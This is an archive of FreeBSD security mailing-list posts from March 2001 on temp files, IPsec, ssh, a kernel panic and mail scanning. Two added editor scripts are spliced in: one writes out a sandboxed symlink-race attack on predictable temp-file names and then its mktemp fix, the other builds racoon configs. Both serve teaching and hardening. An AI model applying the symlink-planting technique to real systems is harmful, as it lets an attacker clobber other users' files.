From owner-freebsd-security Sun Mar 11 15:14:49 2001
Date: Sun, 11 Mar 2001 15:14:44 -0800
From: Kris Kennaway
To: Greg White
Cc: FreeBSD Security
Subject: Re: temp files for security/logcheck
Message-ID: <20010311151444.A69514@mollari.cthul.hu>
References: <200103110435.f2B4ZHw04676@ns1.unixathome.org> <20010310234519.A68252@databits.net> <200103110447.f2B4lww04741@ns1.unixathome.org> <20010310225345.A14180@mollari.cthul.hu> <20010310230843.A26101@greg.cex.ca>
In-Reply-To: <20010310230843.A26101@greg.cex.ca>; from gregw-freebsd-security@greg.cex.ca on Sat, Mar 10, 2001 at 11:08:43PM -0800

On Sat, Mar 10, 2001 at 11:08:43PM -0800, Greg White wrote:
> On Sat, Mar 10, 2001 at 10:53:46PM -0800, Kris Kennaway wrote:
> > On Sun, Mar 11, 2001 at 05:47:58PM +1300, Dan Langille wrote:
> > > AFAIK, the files disappear each time the script is run:
> > >
> > > umask 077
> > > rm -f $TMPDIR/check.$$ $TMPDIR/checkoutput.$$
> >
> > [...]
> >
> > Blah, that's an insecure way to create files in $TMPDIR (which is
> > usually /tmp). It needs to use mktemp(1).
> >
> > Kris
>
> It is in general, but not in this case.
> The script and the directory are
> mode 0700 -- this makes it difficult for it to be insecure. $TMPDIR is
> explicitly set.

Okay.. I was missing context: $TMPDIR is usually inherited from the user's
environment and points to /tmp or whatever their preferred temporary file
directory is.

I don't like the use of /usr/local for temporary file storage -- that may be
on a readonly filesystem. The script needs to use mktemp -d -t to create
itself a secure directory to play in.

Kris

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE6rAbkWry0BWjoQKURAmBUAKCWYbz6ncb2+HN7x3IAYoKtO/qQTACgiOuM
9gCN4FYBw/UbhK90b/+ZTkc=
=KwUc
-----END PGP SIGNATURE-----

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Mar 11 16:51:00 2001
Date: Sun, 11 Mar 2001 19:50:53 -0500 (EST)
From: Mikhail Kruk
To: freebsd-security@freebsd.org
Subject: ssh knownhosts ip vs domain name

I have a machine which has a dynamic ip. I use dyndns.org dynamic DNS
service, so when IP on that machine changes name.dyndns.org points to the
new IP. So when I want to ssh to this box, I do ssh name.dyndns.org.
However ssh doesn't put name.dyndns.org into the known_hosts file, but
rather saves the new ip, which is obviously not what I want.
Is there any way to force it to check by domain name, not by ip?

(I'm using OpenSSH_2.3.0p1)

thanks
mk

From owner-freebsd-security Sun Mar 11 17:45:26 2001
Date: Sun, 11 Mar 2001 19:45:20 -0600
From: jomor
Organization: ahpcns
To: freebsd-security@freebsd.org
Subject: Re: IPSEC tunnel & setkey, How do I tell if setkey worked?
Message-ID: <3AAC2A30.8DA0061D@ahpcns.com>
References: <3AAB2008.E35A125D@ahpcns.com>

jomor wrote:
> I'm finally trying to get a VPN set up between home (DSL) and work
> (T-1). I've been running FreeBSD on my home firewall for a few years and
> now I want it to be an IPSEC tunnel endpoint. The other end will be
> another freeBSD box first, and maybe eventually a Watchguard firebox2
> firewall "appliance". I'm testing off-line for now. I haven't been able
> to find any info on integrating my ipfw rules with the tunnel so I've
> got test boxes set up in an "open" firewall config. I figure I'll get
> the tunnel up first and then break it while I try different ipfw rules.
>

Nevermind... I got it figured out (I think).
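Kris's objection to "$TMPDIR/check.$$" in the first message of this batch is easy to state and easy to underestimate, so here is a runnable demonstration. It is an added example written by the editor, not the logcheck port's script and not anything posted to the list. A freshly made directory stands in for a shared, world-writable /tmp, the "victim" file is constructed for the demo, and the attacker's move (planting a symlink under the predictable PID-based name) is written inline at the point where the real race window sits, between the rm and the redirection. The hardened function uses an explicit mktemp template so it runs on both GNU and BSD mktemp; on FreeBSD, "mktemp -d -t logcheck" builds the same TMPDIR-relative template.

```shell
#!/bin/sh
# Added example (editor's, not the logcheck port's script): why a predictable
# "$TMPDIR/check.$$" in a shared directory is unsafe, and the mktemp(1) fix.
#
# Simulation: SANDBOX plays the role of a world-writable /tmp the attacker can
# write to, VICTIM is a file the attacker wants clobbered (constructed for the
# demo), and the attacker's action is placed inline where the race would be.

SANDBOX=$(mktemp -d "${TMPDIR:-/tmp}/demo.XXXXXXXX") || exit 1
trap 'rm -rf "$SANDBOX"' EXIT
VICTIM="$SANDBOX/victim"
echo "original contents" > "$VICTIM"

victim_contents() { cat "$VICTIM"; }

# The pattern from the port's script. "rm -f" followed by ">" is two separate
# operations; between them the name is free, and $$ (the script's PID) is
# guessable by anyone who can list processes.
insecure_report() {
    TMPDIR=$SANDBOX
    umask 077
    rm -f "$TMPDIR/check.$$"
    # --- race window: attacker plants a symlink under the name the script will use ---
    ln -s "$VICTIM" "$TMPDIR/check.$$"
    # The redirection follows the symlink: VICTIM is truncated and overwritten.
    # umask 077 does not help; the target already exists with its own mode.
    echo "logcheck output" > "$TMPDIR/check.$$"
    rm -f "$TMPDIR/check.$$"
}

# Hardened version: mktemp -d creates a fresh 0700 directory under an
# unpredictable name in one atomic step, so nothing the attacker pre-plants in
# the shared directory can alias the files written inside it.
# Prints the mode string of the work directory so it can be checked.
secure_report() {
    TMPDIR=$SANDBOX
    umask 077
    WORK=$(mktemp -d "${TMPDIR:-/tmp}/logcheck.XXXXXXXX") || return 1
    # attacker tries the predictable name anyway; the script never touches it
    ln -s "$VICTIM" "$TMPDIR/check.$$" 2>/dev/null
    echo "logcheck output" > "$WORK/check"
    ls -ld "$WORK" | cut -c1-10
    rm -f "$TMPDIR/check.$$"
    rm -rf "$WORK"
}

# Stand-alone run: show the damage, reset the victim, then the safe variant.
insecure_report; echo "after insecure_report: $(victim_contents)"
echo "original contents" > "$VICTIM"
secure_report >/dev/null; echo "after secure_report: $(victim_contents)"
```

The insecure function ends with the victim file holding "logcheck output"; the secure one leaves it untouched and reports a drwx------ work directory. Note that "rm -f" before the write does not close the window, it opens it: the only robust fix is a name the attacker cannot predict inside a directory the attacker cannot write.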
From owner-freebsd-security Sun Mar 11 20:39:24 2001
Date: Sun, 11 Mar 2001 22:39:16 -0600
From: Bob Van Valzah
To: FreeBSD-Security@FreeBSD.Org
Cc: FreeBSD-Questions@FreeBSD.Org
Subject: Racoon Problem & Cisco Tunnel
Message-ID: <3AAC52F4.1000602@Talarian.Com>

I have several remote FreeBSD users who want to connect their home LANs
to my trusted network over an IPSec tunnel via a DSL connection. I'd
like my end of the tunnel to terminate on a Cisco if possible. (Though I
do have many FreeBSD boxes handy, I just feel better when layer-2
infrastructure doesn't depend on boxes with hard drives.) Any general
advice on how to do this would be appreciated.

As near as I can tell, I have to run racoon and configure it for
pre-shared keys to talk to the cisco. But I don't think the racoon is
even starting right. I get this message: "ERROR:
pfkey.c:207:pfkey_handler(): pfkey X_SPDDUMP failed No such file or
directory." Happens with the config files I've written and the stock
ones. I'm running a freshly sup'd box with racoon-20010222a built from
ports.

All help and advice appreciated.
Thanks,

Bob

From owner-freebsd-security Sun Mar 11 20:50:16 2001
Date: Sun, 11 Mar 2001 23:42:59 -0500 (EST)
From: pW
To: Bob Van Valzah
Cc: freebsd-security@freebsd.org
Subject: Re: Racoon Problem & Cisco Tunnel
In-Reply-To: <3AAC52F4.1000602@Talarian.Com>

Out of curiosity...
do your DSL users have public static IPs? I work at an ISP and almost all
of our DSL customers have static private IPs and use NAT for public
ones... just wondering because you may have to enable some sort of NAT
transparency otherwise it may break the VPN...

just a thought...

shawn

On Sun, 11 Mar 2001, Bob Van Valzah wrote:

> I have several remote FreeBSD users who want to connect their home LANs
> to my trusted network over an IPSec tunnel via a DSL connection. I'd
> like my end of the tunnel to terminate on a Cisco if possible. (Though I
> do have many FreeBSD boxes handy, I just feel better when layer-2
> infrastructure doesn't depend on boxes with hard drives.) Any general
> advice on how to do this would be appreciated.
>
> As near as I can tell, I have to run racoon and configure it for
> pre-shared keys to talk to the cisco. But I don't think the racoon is
> even starting right. I get this message: "ERROR:
> pfkey.c:207:pfkey_handler(): pfkey X_SPDDUMP failed No such file or
> directory."
> Happens with the config files I've written and the stock
> ones. I'm running a freshly sup'd box with racoon-20010222a built from
> ports.
>
> All help and advice appreciated.
>
> Thanks,
>
> Bob

From owner-freebsd-security Mon Mar 12 01:38:27 2001
Date: Mon, 12 Mar 2001 01:34:20 -0800 (PST)
From: "tjk@tksoft.com"
To: meshko@cs.brandeis.edu (Mikhail Kruk)
Cc: security@FreeBSD.ORG
Subject: Re: ssh knownhosts ip vs domain name
Message-Id: <200103120934.BAA18994@smtp3.tksoft.com>
In-Reply-To: from "Mikhail Kruk" at Mar 11, 2001 07:50:53 PM

Edit the known_hosts file by hand.

Troy

>
> I have a machine which has a dynamic ip. I use dyndns.org dynamic DNS
> service, so when IP on that machine changes name.dyndns.org points to the
> new IP. So when I want to ssh to this box, I do ssh name.dyndns.org.
> However ssh doesn't put name.dyndns.org into the known_hosts file, but
> rather saves the new ip, which is obviously not what I want.
> Is there any way to force it to check by domain name, not by ip?
>
> (I'm using OpenSSH_2.3.0p1)
>
> thanks
> mk

From owner-freebsd-security Mon Mar 12 02:04:44 2001
Date: Mon, 12 Mar 2001 18:14:08 +0800
From: Spades
To: freebsd-security@freebsd.org
Subject: rebooting error
Message-Id: <3.0.32.20010312181407.01724af8@smtp.magix.com.sg>

What kinda error gives this?

> Fatal trap 12: page fault while in kernel mode
> fault virtual address   = 0xbffa6a40
> fault code              = supervisor write, page not present
> instruction pointer     = 0x8:0xc03093a1
> stack pointer           = 0x10:0xd6398c7c
> frame pointer           = 0x10:0xd6398c7c
> code segment            = base 0x0, limit 0xfffff, type 0x1b
>                         = DPL 0, pres 1, def32 1, gran 1
> processor eflags        = interrupt enabled, resume, IOPL = 0
> current process         = 45257 (gcc)
> interrupt mask          = bio
> trap number             = 12
> panic: page fault
>
> syncing disks...
> 132 132 132 132 132 132 132 132 132 132 132 132 132 132 132 132 132 132

From owner-freebsd-security Mon Mar 12 02:56:16 2001
Date: Mon, 12 Mar 2001 12:55:37 +0200
From: Peter Pentchev
To: Spades
Cc: freebsd-security@freebsd.org
Subject: Re: rebooting error
Message-ID: <20010312125537.A469@ringworld.oblivion.bg>
In-Reply-To: <3.0.32.20010312181407.01724af8@smtp.magix.com.sg>; from spades@galaxynet.org on Mon, Mar 12, 2001 at 06:14:08PM +0800

On Mon, Mar 12, 2001 at 06:14:08PM +0800, Spades wrote:
> What kinda error gives this?

Only you can tell us that; look at

http://www.FreeBSD.org/handbook/kerneldebug.html

for a start :)

G'luck,
Peter

--
This sentence contains exactly threee erors.
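Returning to Bob's racoon question earlier in this batch (the thread resumes below): the script that follows is an added example by the editor, not code from the thread or from the racoon port. It produces the two things racoon needs before it can negotiate a pre-shared-key tunnel, a setkey(8) security policy and a racoon.conf plus psk.txt pair, as shell functions whose output can be checked on any machine; the gateway and network addresses are made up from documentation ranges. One reading of the error Bob quotes, offered by the editor and not confirmed anywhere in the thread: KAME's SPD dump returns ENOENT when the SPD holds no entries, and racoon of that vintage treats a failed startup dump as fatal, so loading a policy with setkey before starting racoon is the first thing to try, and "setkey -DP" is how to see whether a policy is in place (which also answers jomor's subject line above).

```shell
#!/bin/sh
# Added example (editor's, not from the thread or the racoon port): generate
# and sanity-check the configuration racoon needs for a pre-shared-key tunnel.
# All addresses are made-up documentation ranges.

# Emit the setkey(8) security policy for an ESP tunnel between two gateways.
# Usage: spd_policy LOCALNET REMOTENET LOCALGW REMOTEGW
# Load it with:  spd_policy ... | setkey -c      Inspect it with:  setkey -DP
spd_policy() {
    lnet=$1; rnet=$2; lgw=$3; rgw=$4
    printf 'spdadd %s %s any -P out ipsec esp/tunnel/%s-%s/require;\n' \
        "$lnet" "$rnet" "$lgw" "$rgw"
    printf 'spdadd %s %s any -P in ipsec esp/tunnel/%s-%s/require;\n' \
        "$rnet" "$lnet" "$rgw" "$lgw"
}

# Emit a minimal racoon.conf: main-mode IKE, pre-shared key, for PEER.
# Usage: racoon_conf PEER PSKFILE
racoon_conf() {
    peer=$1; pskfile=$2
    cat <<EOF
path pre_shared_key "$pskfile";

remote $peer {
        exchange_mode main;
        proposal {
                encryption_algorithm 3des;
                hash_algorithm sha1;
                authentication_method pre_shared_key;
                dh_group 2;
        }
}

sainfo anonymous {
        pfs_group 2;
        lifetime time 1 hour;
        encryption_algorithm 3des;
        authentication_algorithm hmac_sha1;
        compression_algorithm deflate;
}
EOF
}

# psk.txt holds one "<peer-address> <secret>" pair per line ('#' comments and
# blank lines allowed). The secret authenticates the whole tunnel, so insist
# on mode 0600 and on well-formed lines before handing the file to racoon.
# Usage: psk_check FILE   (returns 0 if acceptable, 1 with a reason otherwise)
psk_check() {
    f=$1
    [ -f "$f" ] || { echo "$f: missing"; return 1; }
    mode=$(ls -l "$f" | cut -c2-10)
    [ "$mode" = "rw-------" ] || { echo "$f: mode is $mode, want rw-------"; return 1; }
    awk '/^#/ || NF == 0 { next } NF != 2 { bad = 1 } END { exit bad }' "$f" \
        || { echo "$f: every line must be <peer> <secret>"; return 1; }
    return 0
}

# Stand-alone run: print the policy and config for made-up addresses.
spd_policy 10.1.0.0/24 10.2.0.0/24 192.0.2.1 198.51.100.1
racoon_conf 198.51.100.1 /usr/local/etc/racoon/psk.txt
```

The policy is written per direction because the SPD is: "out" from the local network with the tunnel endpoints in local-remote order, "in" from the remote network with them reversed. The psk.txt check is deliberately strict; a key file readable by other users is a tunnel anyone on the box can impersonate.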
From owner-freebsd-security Mon Mar 12 08:08:07 2001
Date: Mon, 12 Mar 2001 10:06:37 -0600
From: Bob Van Valzah
To: pW
Cc: FreeBSD-Security@FreeBSD.Org, FreeBSD-Questions@FreeBSD.Org
Subject: Re: Racoon Problem & Cisco Tunnel
Message-ID: <3AACF40D.4080504@Talarian.Com>

Yes. The five DSL setups with which I'm familiar all grant at least one
public address per house. I believe all are static, but one might be
dynamic. Interference with protocols like IPSec is one of the reasons why
I'd make a public address a requirement when choosing a DSL provider.

When it comes to NAT, I'm with Vint Cerf--avoid it if at all possible.
Let's hasten the deployment of IPv6.

Bob

pW wrote:

> Out of curiosity...
> do your DSL users have public static IPs? I work at an ISP and almost all
> of our DSL customers have static private IPs and use NAT for public
> ones... just wondering because you may have to enable some sort of NAT
> transparency otherwise it may break the VPN...
>
> just a thought...
>
> shawn
>
> On Sun, 11 Mar 2001, Bob Van Valzah wrote:
>
>> I have several remote FreeBSD users who want to connect their home LANs
>> to my trusted network over an IPSec tunnel via a DSL connection. I'd
>> like my end of the tunnel to terminate on a Cisco if possible. (Though I
>> do have many FreeBSD boxes handy, I just feel better when layer-2
>> infrastructure doesn't depend on boxes with hard drives.) Any general
>> advice on how to do this would be appreciated.
>>
>> As near as I can tell, I have to run racoon and configure it for
>> pre-shared keys to talk to the cisco. But I don't think the racoon is
>> even starting right. I get this message: "ERROR:
>> pfkey.c:207:pfkey_handler(): pfkey X_SPDDUMP failed No such file or
>> directory." Happens with the config files I've written and the stock
>> ones. I'm running a freshly sup'd box with racoon-20010222a built from
>> ports.
>>
>> All help and advice appreciated.
>>
>> Thanks,
>>
>> Bob

From owner-freebsd-security Mon Mar 12 10:13:10 2001
Date: Mon, 12 Mar 2001 10:12:38 -0800 (PST)
From: John Baldwin
To: Spades
Cc: freebsd-security@FreeBSD.org
Subject: RE: rebooting error
In-Reply-To: <3.0.32.20010312181407.01724af8@smtp.magix.com.sg>

On 12-Mar-01 Spades wrote:
> What kinda error gives this?

Either a bug in the kernel, or possibly bad hardware (could be bad memory,
disk, CPU, etc.). Can you reproduce it, and is it always the same set of
messages?

>> Fatal trap 12: page fault while in kernel mode
>> fault virtual address   = 0xbffa6a40
>> fault code              = supervisor write, page not present
>> instruction pointer     = 0x8:0xc03093a1
>> stack pointer           = 0x10:0xd6398c7c
>> frame pointer           = 0x10:0xd6398c7c
>> code segment            = base 0x0, limit 0xfffff, type 0x1b
>>                         = DPL 0, pres 1, def32 1, gran 1
>> processor eflags        = interrupt enabled, resume, IOPL = 0
>> current process         = 45257 (gcc)
>> interrupt mask          = bio
>> trap number             = 12
>> panic: page fault
>>
>> syncing disks... 132 132 132 132 132 132 132 132 132 132 132 132 132 132
> 132 132 132 132

--

John Baldwin -- http://www.FreeBSD.org/~jhb/
PGP Key: http://www.baldwin.cx/~john/pgpkey.asc
"Power Users Use the Power to Serve!"
  -  http://www.FreeBSD.org/

From owner-freebsd-security Mon Mar 12 10:19:36 2001
Date: Mon, 12 Mar 2001 18:57:53 +0100
From: "Jose M. Alcaide"
Organization: Universidad del Pais Vasco - Dpto. de Electricidad y Electronica
To: security@FreeBSD.org
Subject: NFS and kerberos?
Message-ID: <3AAD0E21.4EDB1E4C@we.lc.ehu.es>

Hello,

I want to authenticate NFS clients on an NFS server (all of them running
FreeBSD 4.3). I found that SecureRPC is not an option, but I also found
the "-kerb" flag in exports(5). However, the manpage says:

     The -kerb option specifies that the Kerberos authentication server
     should be used to authenticate and map client credentials. This
     option requires that the kernel be built with the NFSKERB option.
     The use of this option will prevent the kernel from compiling
     unless calls to the appropriate Kerberos encryption routines are
     provided in the NFS source.
I searched sys/nfs/* for NFSKERB and indeed I found some "XXX" placeholders
parenthesized by "#ifdef NFSKERB" for -I think- those calls to the Kerberos
encryption routines. Obviously the kernel cannot be compiled if NFSKERB is
#define'd.

My question is: can I use kerberos for NFS client authentication? If I
cannot, then I'll welcome any suggestions about how to share file systems
with authenticated clients.

TIA,
-- JMA

****** Jose M. Alcaide // jose@we.lc.ehu.es // jmas@FreeBSD.org ******
** "Beware of Programmers who carry screwdrivers" -- Leonard Brandwein **

From owner-freebsd-security Mon Mar 12 13:59:35 2001
Date: Mon, 12 Mar 2001 16:56:43 -0500
From: "Will Mitayai Keeso Rowe"
To: freebsd-security@freebsd.org
Subject: Virus Scanning Software for FreeBSD

Is anyone aware of any virus scanning solutions for freebsd, particularly
solutions for email?
I don't trust my users not to follow proper email guidelines, and thus
would like to stop email at the server before they get delivered the
message.

Regards,
Mit

--
Will Mitayai Keeso Rowe

For full contact information, please visit:
http://my.infotriever.com/mitayai

[attachment: Will Mitayai Keeso Rowe.vcf]

From owner-freebsd-security Mon Mar 12 14:04:55 2001
Date: Mon, 12 Mar 2001 15:04:48 -0700 (MST)
From: "Travis [Admin Team]"
To: Will Mitayai Keeso Rowe
Cc: freebsd-security@freebsd.org
Subject: Re: Virus Scanning Software for FreeBSD

On Mon, 12 Mar 2001, Will Mitayai Keeso Rowe wrote:

> Is anyone aware of any virus scanning solutions for freebsd, particularly
> solutions for email? I don't trust my users not to follow proper email
> guidelines, and thus would like to stop email at the server before they get
> delivered the message.

Greetings Mit, check out the ports collections - I believe there are two
and one front end. To be sure go to freebsd.org and click on ported
applications - search for virus.

Travis

/* -=[ Travis Ogden ]-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
   RapidNet Admin Team          "Courage is not defined by those who
   Phone#: 605.341.3283          fought and did not fall, but by those
   ICQ#: 30220771                who fought, fell, and rose again."
   Mail: traviso@RapidNet.com
   Fax#: 605.348.1031            Web: www.RapidNet.com/~traviso
   800#: 800.763.2525
   ATTENTION! "RapidNet has moved to 330 Knollwood Drive, Rapid City, SD 57701."
   -=-=-=-=-=-=-=-=-=-=-=-=-=-[ traviso@rapidnet.com ]=-=-=-=-= */

From owner-freebsd-security Mon Mar 12 14:09:26 2001
Date: Mon, 12 Mar 2001 17:08:57 -0500 (EST)
From: Rob Simmons
To: Will Mitayai Keeso Rowe
Cc: freebsd-security@freebsd.org
Subject: Re: Virus Scanning Software for FreeBSD

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Take a look at amavis-perl-10, inflex-0.1.5.c, and uvscan-4.07e. They are
in the ports collection.
uvscan-4.07e is an eval and you have to pay for it eventually, but there
aren't any opensource scanning engines that I know of. The other two are
interfaces for something like uvscan-4.07e.

Robert Simmons
Systems Administrator
http://www.wlcg.com/

On Mon, 12 Mar 2001, Will Mitayai Keeso Rowe wrote:

> Is anyone aware of any virus scanning solutions for freebsd, particularly
> solutions for email? I don't trust my users not to follow proper email
> guidelines, and thus would like to stop email at the server before they get
> delivered the message.
>
> Regards,
> Mit
>
> --
> Will Mitayai Keeso Rowe
>
> For full contact information, please visit:
> http://my.infotriever.com/mitayai
>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE6rUj9v8Bofna59hYRAjq+AJ9Wbc5o0Znrjx8RPcVybyEogUr7wwCeM/md
I49PRXYh8iBIjAAgxgmXrp0=
=Hp2V
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Mar 12 14:11:03 2001
Date: Tue, 13 Mar 2001 08:52:40 +1030
From: Mark Newton
To: Will Mitayai Keeso Rowe
Cc: freebsd-security@freebsd.org
Subject: Re: Virus Scanning Software for FreeBSD
Message-ID: <20010313085240.A24044@atdot.dotat.org>
In-Reply-To: ; from mit@mitayai.net on Mon, Mar 12, 2001 at 04:56:43PM -0500

On Mon, Mar 12, 2001 at 04:56:43PM -0500, Will Mitayai Keeso Rowe wrote:
> Is anyone aware of any virus scanning solutions for freebsd, particularly
> solutions for email? I don't trust my users not to follow proper email
> guidelines, and thus would like to stop email at the server before they get
> delivered the message.

There's a sourceforge project called AMaViS - http://www.amavis.org

We're using it at work; It seems to do the right thing.

  - mark

--------------------------------------------------------------------
I tried an internal modem,                    newton@atdot.dotat.org
     but it hurt when I walked.                          Mark Newton
----- Voice: +61-4-1620-2223 ------------- Fax: +61-8-82231777 -----

From owner-freebsd-security Mon Mar 12 14:34:19 2001
Date: Mon, 12 Mar 2001 14:33:53 -0800 (PST)
From: Clark Shishido
To: mit@mitayai.net (Will Mitayai Keeso Rowe)
Cc: freebsd-security@freebsd.org
Subject: Re: Virus Scanning Software for FreeBSD
In-Reply-To: from "Will Mitayai Keeso Rowe" at Mar 12, 2001 04:56:43 PM

>
> Is anyone aware of any virus scanning solutions for freebsd, particularly
> solutions for email? I don't trust my users not to follow proper email
> guidelines, and thus would like to stop email at the server before they get
> delivered the message.
>

I use this procmail filter to protect myself from all kinds of malicious
content, not just known trojans or viruses.

http://www.impsec.org/email-tools/procmail-security.html

it'll protect you and your mail from all those *.vbs worms out there and
those yet to be discovered.

--clark

From owner-freebsd-security Mon Mar 12 14:40:00 2001
Date: 12 Mar 2001 23:39:54 +0100
From: Dag-Erling Smorgrav
To: Spades
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: rebooting error
References: <3.0.32.20010312181407.01724af8@smtp.magix.com.sg>
In-Reply-To: Spades's message of "Mon, 12 Mar 2001 18:14:08 +0800"

Spades writes:
> What kinda error gives this?
Please show me the output of:

1) uname -a
2) nm $(sysctl -n kern.bootfile) | grep \^c0309 | sort

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Mon Mar 12 14:48:33 2001
Delivered-To: freebsd-security@freebsd.org Received: from ldc.ro (ldc-gw.pub.ro [192.129.3.227]) by hub.freebsd.org (Postfix) with SMTP id 94D3537B719 for ; Mon, 12 Mar 2001 14:48:16 -0800 (PST) (envelope-from razor@ldc.ro) Received: (qmail 78324 invoked by uid 666); 12 Mar 2001 22:48:13 -0000
Date: Tue, 13 Mar 2001 00:48:13 +0200
From: Alex Popa
To: freebsd-security@freebsd.org
Cc: freebsd-stable@freebsd.org
Subject: 4.3-BETA, sshd.core found in root directory.
Message-ID: <20010313004813.A78221@ldc.ro>
Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

I am not really sure what this means (could mean a lot of things, including bad memory on my machine), but here are the facts:

The system was cvsupped and compiled on March 10th.

$ uname -a
FreeBSD ns.ldc.ro 4.3-BETA FreeBSD 4.3-BETA #0: Sat Mar 10 15:16:38 EET 2001 root@ns.ldc.ro:/usr/src/sys/compile/NS i386
$ ls -l /sshd.core
-rw------- 1 root wheel 507904 Mar 12 16:40 /sshd.core
$ ls -l /usr/sbin/sshd
-r-xr-xr-x 1 root wheel 196532 Mar 10 16:07 /usr/sbin/sshd
# gdb /usr/sbin/sshd /sshd.core
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
(no debugging symbols found)...
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /usr/lib/libopie.so.2...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libmd.so.2...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libcrypt.so.2...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libcrypto.so.2...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libutil.so.3...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libz.so.2...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libwrap.so.3...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libpam.so.1...(no debugging symbols found)...done.
---Type to continue, or q to quit---
Reading symbols from /usr/lib/libc.so.4...(no debugging symbols found)...done.
Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols found)...done.
#0  0x281741c8 in login_getpwclass () from /usr/lib/libutil.so.3
(gdb) bt
#0  0x281741c8 in login_getpwclass () from /usr/lib/libutil.so.3
#1  0x80532e8 in getsockname ()
#2  0x805a9ef in getsockname ()
#3  0x8052fd0 in getsockname ()
#4  0x804d81d in getsockname ()
#5  0x804be95 in getsockname ()
(gdb)

$ ident /usr/sbin/sshd
/usr/sbin/sshd:
$OpenBSD: sshd.c,v 1.132 2000/10/13 18:34:46 markus Exp $ $FreeBSD: src/crypto/openssh/sshd.c,v 1.6.2.7 2001/03/04 15:13:08 markm Exp $ $OpenBSD: auth-rhosts.c,v 1.16 2000/10/03 18:03:03 markus Exp $ $OpenBSD: auth-passwd.c,v 1.18 2000/10/03 18:03:03 markus Exp $ $FreeBSD: src/crypto/openssh/auth-passwd.c,v 1.2.2.4 2001/03/04 15:13:08 markm Exp $ $OpenBSD: auth-rsa.c,v 1.32 2000/10/14 12:19:45 markus Exp $ $FreeBSD: src/crypto/openssh/auth-rsa.c,v 1.2.2.3 2001/01/12 04:25:55 green Exp $ $OpenBSD: auth-rh-rsa.c,v 1.17 2000/10/03 18:03:03 markus Exp $ $FreeBSD: src/crypto/openssh/auth-rh-rsa.c,v 1.1.1.1.2.3 2001/01/12 04:25:55 green Exp $ $OpenBSD: pty.c,v 1.16 2000/09/07 21:13:37 markus Exp $ $FreeBSD: src/crypto/openssh/pty.c,v 1.2.2.2
2000/10/28 23:00:49 kris Exp $ $OpenBSD: log-server.c,v 1.17 2000/09/12 20:53:10 markus Exp $ $OpenBSD: login.c,v 1.15 2000/09/07 20:27:52 deraadt Exp $ $FreeBSD: src/crypto/openssh/login.c,v 1.3.2.2 2000/10/28 23:00:48 kris Exp $ $OpenBSD: servconf.c,v 1.53 2000/10/14 12:12:09 markus Exp $ $FreeBSD: src/crypto/openssh/servconf.c,v 1.3.2.10 2001/03/04 15:13:08 markm Exp $ $OpenBSD: serverloop.c,v 1.34 2000/10/27 07:32:18 markus Exp $ $OpenBSD: auth.c,v 1.11 2000/10/11 20:27:23 markus Exp $ $FreeBSD: src/crypto/openssh/auth.c,v 1.3.2.3 2001/01/12 04:25:55 green Exp $ $OpenBSD: auth1.c,v 1.6 2000/10/11 20:27:23 markus Exp $ $FreeBSD: src/crypto/openssh/auth1.c,v 1.3.2.5 2001/03/04 15:13:08 markm Exp $ $OpenBSD: auth2.c,v 1.20 2000/10/14 12:16:56 markus Exp $ $FreeBSD: src/crypto/openssh/auth2.c,v 1.2.2.5 2001/03/04 15:13:08 markm Exp $ $OpenBSD: auth-options.c,v 1.5 2000/10/09 21:32:34 markus Exp $ $OpenBSD: session.c,v 1.42 2000/10/27 07:32:18 markus Exp $ $FreeBSD: src/crypto/openssh/session.c,v 1.4.2.7 2001/02/04 20:21:06 green Exp $ $OpenBSD: dh.c,v 1.2 2000/10/11 20:11:35 markus Exp $ $FreeBSD: src/crypto/openssh/auth-pam.c,v 1.2.2.1 2001/01/12 04:25:54 green Exp $ $FreeBSD: src/crypto/openssh/auth2-skey.c,v 1.2.2.1 2001/01/12 04:25:55 green Exp $ $OpenBSD: auth2-skey.c,v 1.1 2000/10/11 20:14:38 markus Exp $ $OpenBSD: auth-skey.c,v 1.9 2000/10/19 16:41:13 deraadt Exp $ $FreeBSD: src/crypto/openssh/auth-skey.c,v 1.1.1.1.2.4 2001/01/12 04:25:55 green Exp $ $OpenBSD: kex.c,v 1.12 2000/10/11 20:27:23 markus Exp $ $OpenBSD: dispatch.c,v 1.5 2000/09/21 11:25:34 markus Exp $ $OpenBSD: ttymodes.c,v 1.8 2000/09/07 20:27:55 deraadt Exp $ $OpenBSD: tildexpand.c,v 1.8 2000/09/07 20:27:55 deraadt Exp $ $OpenBSD: rsa.c,v 1.16 2000/09/07 20:27:53 deraadt Exp $ $FreeBSD: src/crypto/openssh/rsa.c,v 1.1.1.1.2.6 2001/02/12 06:45:42 kris Exp $ $OpenBSD: readpass.c,v 1.12 2000/10/11 20:14:39 markus Exp $ $OpenBSD: mpaux.c,v 1.14 2000/09/07 20:27:52 deraadt Exp $ $FreeBSD: 
